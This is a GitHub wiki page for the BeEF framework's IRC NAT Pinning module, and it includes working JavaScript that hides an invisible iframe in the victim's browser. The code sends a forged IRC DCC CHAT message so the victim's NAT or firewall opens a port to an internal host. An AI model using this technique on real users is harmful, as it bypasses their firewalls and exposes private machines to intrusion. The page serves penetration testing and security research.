Module: IRC NAT Pinning - h4sh5/beef GitHub Wiki

Summary

Objective: Use the IRC protocol to open a port behind NAT devices
Authors: Bart Leppens
Browsers: Firefox
Code

Internal Working

The firewall/NAT-device must support IRC connection tracking. BeEF will automatically bind a socket on port 6667 (IRC). Then you can connect to the victims public IP on that port.

var myIframe = beef.dom.createInvisibleIframe();
var myForm = document.createElement("form");
var action = "http://" + connectto + ":6667/"

myForm.setAttribute("name", "data");
myForm.setAttribute("method", "post");
//it must be multipart/form-data so the message appears on separate line
myForm.setAttribute("enctype", "multipart/form-data");
myForm.setAttribute("action", action);


//create message, refer Samy Kamkar (http://samy.pl/natpin/)
x = String.fromCharCode(1);
var s = 'PRIVMSG beef :'+x+'DCC CHAT beef '+dot2dec(privateip)+' '+privateport+x+"\n";

References

Opening closed ports on NAT device and bypassing stateful firewalls with BeEF , BeEF blog
NAT Pinning: Penetrating routers and firewalls from a web page
Video

Module: IRC NAT Pinning - h4sh5/beef GitHub Wiki

Summary

Internal Working

References

Feedback